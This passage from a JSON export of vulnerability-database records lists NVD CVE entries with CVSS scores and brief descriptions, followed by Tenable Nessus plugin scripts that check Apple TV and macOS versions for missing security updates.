{"severity": "LOW", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 3.5, "vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13869"], "modified": "2020-06-09T13:21:00", "cpe": [], "id": "CVE-2020-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-13869", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application 
Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, 
"privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": 
false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": "CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", 
"cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:52:28", "description": "An issue was discovered in the HDF HDF5 1.8.20 library. There is a memcpy parameter overlap in the function H5O_link_decode in H5Olink.c.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-10T21:29:00", "title": "CVE-2018-13869", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13869"], "modified": "2018-08-31T17:10:00", "cpe": ["cpe:/a:hdfgroup:hdf5:1.8.20"], "id": "CVE-2018-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-13869", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:hdfgroup:hdf5:1.8.20:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:36", "description": "An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the \"Kernel\" component. 
It allows attackers to bypass intended memory-read restrictions via a crafted app.", "edition": 9, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-25T21:29:00", "title": "CVE-2017-13869", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-13869"], "modified": "2019-03-08T16:06:00", "cpe": [], "id": "CVE-2017-13869", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13869", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-03-01T01:24:23", "description": "According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. 
It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.", "edition": 28, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-01-05T00:00:00", "title": "Apple TV < 11.2 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-13869", "CVE-2017-13856", "CVE-2017-13866", "CVE-2017-13865", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-13870", "CVE-2017-13868", "CVE-2017-7156", "CVE-2017-7160", "CVE-2017-13833", "CVE-2017-13867", "CVE-2017-13861", "CVE-2017-7154", "CVE-2017-7157", "CVE-2017-13862"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:apple:apple_tv"], "id": "APPLETV_11_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105612", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105612);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\n \"CVE-2017-7154\",\n \"CVE-2017-7156\",\n \"CVE-2017-7157\",\n \"CVE-2017-7160\",\n \"CVE-2017-7162\",\n \"CVE-2017-13833\",\n \"CVE-2017-13855\",\n \"CVE-2017-13856\",\n \"CVE-2017-13861\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13866\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13870\",\n \"CVE-2017-13876\"\n );\n script_xref(name:\"APPLE-SA\", value:\"APPLE-SA-2017-12-6-4\");\n\n script_name(english:\"Apple TV < 11.2 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the build number.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Apple TV device is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its banner, the version of Apple TV on the remote device\nis prior to 11.2. 
It is, therefore, affected by multiple\nvulnerabilities as described in the HT208327 security advisory.\n\nNote that only 4th and 5th generation models are affected by these\nvulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208327\");\n # https://seclists.org/fulldisclosure/2017/Dec/29\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?262ee1b8\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apple TV version 11.2 or later. Note that this update is\nonly available for 4th and 5th generation models.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7162\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Safari Webkit Proxy Object Type Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apple:apple_tv\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"appletv_version.nasl\");\n script_require_keys(\"AppleTV/Version\", \"AppleTV/Model\", \"AppleTV/URL\", \"AppleTV/Port\");\n script_require_ports(\"Services/www\", 7000);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"appletv_func.inc\");\n\nurl = get_kb_item('AppleTV/URL');\nif (empty_or_null(url)) exit(0, 'Cannot determine Apple TV URL.');\nport = get_kb_item('AppleTV/Port');\nif (empty_or_null(port)) exit(0, 'Cannot determine Apple TV port.');\n\nbuild = get_kb_item('AppleTV/Version');\nif (empty_or_null(build)) audit(AUDIT_UNKNOWN_DEVICE_VER, 'Apple TV');\n\nmodel = get_kb_item('AppleTV/Model');\nif (empty_or_null(model)) exit(0, 'Cannot determine Apple TV model.');\n\n# https://en.wikipedia.org/wiki/TvOS\n# 4th gen model \"5,3\" and 5th gen model \"6,2\" share same build\nfixed_build = \"15K106\";\ntvos_ver = '11';\n\n# determine gen from the model\ngen = APPLETV_MODEL_GEN[model];\n\nappletv_check_version(\n build : build,\n fix : fixed_build,\n affected_gen : make_list(4, 5),\n fix_tvos_ver : tvos_ver,\n model : model,\n gen : gen,\n port : port,\n url : url,\n severity : SECURITY_WARNING\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:43:24", "description": "The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. 
It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server", "edition": 30, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12837", "CVE-2017-9798", "CVE-2017-13869", "CVE-2017-7158", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13904", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-7154", "CVE-2017-13862"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOSX_SECUPD2017-005.NASL", "href": "https://www.tenable.com/plugins/nessus/105081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105081);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-3735\",\n \"CVE-2017-7154\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\",\n \"CVE-2017-12837\",\n \"CVE-2017-13847\",\n \"CVE-2017-13855\",\n \"CVE-2017-13862\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13872\",\n \"CVE-2017-13904\",\n \"CVE-2017-15422\",\n \"CVE-2017-1000254\"\n );\n script_bugtraq_id(\n 100515,\n 100860,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102100,\n 103134,\n 103135\n );\n\n script_name(english:\"macOS and Mac OS X Multiple Vulnerabilities (Security Update 2017-002 and 2017-005)\");\n script_summary(english:\"Checks for the presence of Security Update 2017-002 / 2017-005.\");\n\n 
script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS or Mac OS X security update that\nfixes multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running Mac OS X 10.11.6 or Mac OS X 10.12.6 and is\nmissing a security update. It is therefore, affected by multiple\nvulnerabilities affecting the following components :\n\n - apache\n - curl\n - IOAcceleratorFamily\n - IOKit\n - Kernel\n - OpenSSL\n - Screen Sharing Server\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"solution\", value:\n\"Install Security Update 2017-005 or later for 10.11.x or\nSecurity Update 2017-002 or later for 10.12.x.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"Host/MacOSX/packages/boms\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Compare 2 patch numbers to determine if patch requirements are satisfied.\n# Return true if this patch or a later patch is applied\n# Return false otherwise\nfunction check_patch(year, number)\n{\n local_var p_split = split(patch, sep:\"-\");\n local_var p_year = int( p_split[0]);\n local_var p_num = int( p_split[1]);\n\n if (year > p_year) return TRUE;\n else if (year < p_year) return FALSE;\n else if (number >= p_num) return TRUE;\n else return FALSE;\n}\n\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\nos = get_kb_item_or_exit(\"Host/MacOSX/Version\");\n\nif (!preg(pattern:\"Mac OS X 10\\.(11\\.6|12\\.6)([^0-9]|$)\", string:os))\n audit(AUDIT_OS_NOT, \"Mac OS X 10.11.6 or Mac OS X 10.12.6\");\n\nif (\"10.11.6\" >< os)\n patch = \"2017-005\";\nelse\n patch = \"2017-002\";\n\npackages = get_kb_item_or_exit(\"Host/MacOSX/packages/boms\", exit_code:1);\nsec_boms_report = pgrep(\n pattern:\"^com\\.apple\\.pkg\\.update\\.(security\\.|os\\.SecUpd).*bom$\",\n string:packages\n);\nsec_boms = split(sec_boms_report, sep:'\\n');\n\nforeach package (sec_boms)\n{\n # Grab patch year and number\n match = pregmatch(pattern:\"[^0-9](20[0-9][0-9])[-.]([0-9]{3})[^0-9]\", string:package);\n if (empty_or_null(match[1]) || empty_or_null(match[2]))\n continue;\n\n patch_found = check_patch(year:int(match[1]), number:int(match[2]));\n if (patch_found) exit(0, \"The host has Security Update \" + patch + \" or later installed and is therefore not affected.\");\n}\n\nreport = '\\n Missing security 
update : ' + patch;\nreport += '\\n Installed security BOMs : ';\nif (sec_boms_report) report += str_replace(find:'\\n', replace:'\\n ', string:sec_boms_report);\nelse report += 'n/a';\nreport += '\\n';\n\nsecurity_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-01T03:37:07", "description": "The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.", "edition": 33, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-9798", "CVE-2017-13869", "CVE-2017-5754", "CVE-2017-13887", "CVE-2017-7155", "CVE-2017-13871", "CVE-2017-7151", "CVE-2017-13865", "CVE-2017-13860", "CVE-2017-7158", "CVE-2017-13892", "CVE-2017-3735", "CVE-2017-7172", "CVE-2017-13858", "CVE-2017-13886", "CVE-2017-13904", "CVE-2017-13878", "CVE-2017-7171", "CVE-2017-13855", "CVE-2017-7162", "CVE-2017-13876", "CVE-2017-1000254", "CVE-2017-7159", "CVE-2017-13911", "CVE-2017-15422", "CVE-2017-13868", "CVE-2017-13847", "CVE-2017-13867", "CVE-2017-7163", "CVE-2017-7173", "CVE-2017-13872", "CVE-2017-13883", "CVE-2017-7154", "CVE-2017-13905", "CVE-2017-13848", "CVE-2017-13862", "CVE-2017-13875"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:apple:macos", "cpe:/o:apple:mac_os_x"], "id": "MACOS_10_13_2.NASL", "href": "https://www.tenable.com/plugins/nessus/105080", "sourceData": "#\n# (C) Tenable Network Security, 
Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105080);\n script_version(\"1.12\");\n script_cvs_date(\"Date: 2019/06/19 15:17:43\");\n\n script_cve_id(\n \"CVE-2017-1000254\",\n \"CVE-2017-13847\",\n \"CVE-2017-13848\",\n \"CVE-2017-13855\",\n \"CVE-2017-13858\",\n \"CVE-2017-13860\",\n \"CVE-2017-13862\",\n \"CVE-2017-13865\",\n \"CVE-2017-13867\",\n \"CVE-2017-13868\",\n \"CVE-2017-13869\",\n \"CVE-2017-13871\",\n \"CVE-2017-13872\",\n \"CVE-2017-13875\",\n \"CVE-2017-13876\",\n \"CVE-2017-13878\",\n \"CVE-2017-13883\",\n \"CVE-2017-13886\",\n \"CVE-2017-13887\",\n \"CVE-2017-13892\",\n \"CVE-2017-13904\",\n \"CVE-2017-13905\",\n \"CVE-2017-13911\",\n \"CVE-2017-15422\",\n \"CVE-2017-3735\",\n \"CVE-2017-5754\",\n \"CVE-2017-7151\",\n \"CVE-2017-7154\",\n \"CVE-2017-7155\",\n \"CVE-2017-7158\",\n \"CVE-2017-7159\",\n \"CVE-2017-7162\",\n \"CVE-2017-7163\",\n \"CVE-2017-7171\",\n \"CVE-2017-7172\",\n \"CVE-2017-7173\",\n \"CVE-2017-9798\"\n );\n script_bugtraq_id(\n 100515,\n 100872,\n 101115,\n 101981,\n 102097,\n 102098,\n 102099,\n 102100,\n 102378,\n 103134,\n 103135\n );\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"macOS 10.13.x < 10.13.2 Multiple Vulnerabilities (Meltdown)\");\n script_summary(english:\"Checks the version of Mac OS X / macOS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a macOS update that fixes multiple security\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Mac OS X that is 10.13.x\nprior to 10.13.2. 
It is, therefore, affected by multiple\nvulnerabilities in the following components :\n\n - apache\n - curl\n - Directory Utility\n - IOAcceleratorFamily\n - IOKit\n - Intel Graphics Driver\n - Kernel\n - Mail\n - Mail Drafts\n - OpenSSL\n - Screen Sharing Server\n\nNote that successful exploitation of the most serious issues can\nresult in arbitrary code execution.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208331\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.apple.com/en-us/HT208394\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to macOS version 10.13.2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-7172\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mac OS X Root Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:mac_os_x\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:apple:macos\");\n script_set_attribute(attribute:\"stig_severity\", 
value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Host/MacOSX/Version\", \"Host/OS\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nos = get_kb_item(\"Host/MacOSX/Version\");\nif (!os)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if (\"Mac OS X\" >!< os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\n c = get_kb_item(\"Host/OS/Confidence\");\n if (c <= 70) exit(1, \"Can't determine the host's OS with sufficient confidence.\");\n}\nif (!os) audit(AUDIT_OS_NOT, \"macOS / Mac OS X\");\n\nmatches = pregmatch(pattern:\"Mac OS X ([0-9]+(\\.[0-9]+)+)\", string:os);\nif 